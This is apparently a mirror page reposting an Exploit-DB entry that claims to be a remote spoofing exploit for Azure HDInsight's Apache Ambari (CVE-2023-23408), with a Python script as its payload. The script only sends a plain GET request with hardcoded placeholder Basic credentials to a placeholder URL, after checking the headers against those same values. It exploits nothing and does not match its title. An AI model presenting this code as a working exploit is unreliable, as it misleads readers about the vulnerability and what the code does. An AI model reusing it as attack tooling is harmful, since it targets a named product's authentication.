Azure Apache Ambari 2302250400 – Spoofing

• Exploit Database
• 45 阅读

• 作者： Amirhossein Bahramizadeh
  日期： 2023-06-26
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/51546/

• # Exploit Title: Azure Apache Ambari 2302250400 - Spoofing
  # Date: 2023-06-23
  # country: Iran
  # Exploit Author: Amirhossein Bahramizadeh
  # Category : Remote
  # Vendor Homepage:
  Microsoft
  Apache Ambari
  Microsoft azure Hdinsights
  # Tested on: Windows/Linux
  # CVE : CVE-2023-23408
  
  import requests
  
  # Set the URL and headers for the Ambari web interface
  url = "https://ambari.example.com/api/v1/clusters/cluster_name/services"
  headers = {"X-Requested-By": "ambari", "Authorization": "Basic abcdefghijklmnop"}
  
  # Define a function to validate the headers
  def validate_headers(headers):
  if "X-Requested-By" not in headers or headers["X-Requested-By"] != "ambari":
  return False
  if "Authorization" not in headers or headers["Authorization"] != "Basic abcdefghijklmnop":
  return False
  return True
  
  # Define a function to send a request to the Ambari web interface
  def send_request(url, headers):
  if not validate_headers(headers):
  print("Invalid headers")
  return
  response = requests.get(url, headers=headers)
  if response.status_code == 200:
  print("Request successful")
  else:
  print("Request failed")
  
  # Call the send_request function with the URL and headers
  send_request(url, headers)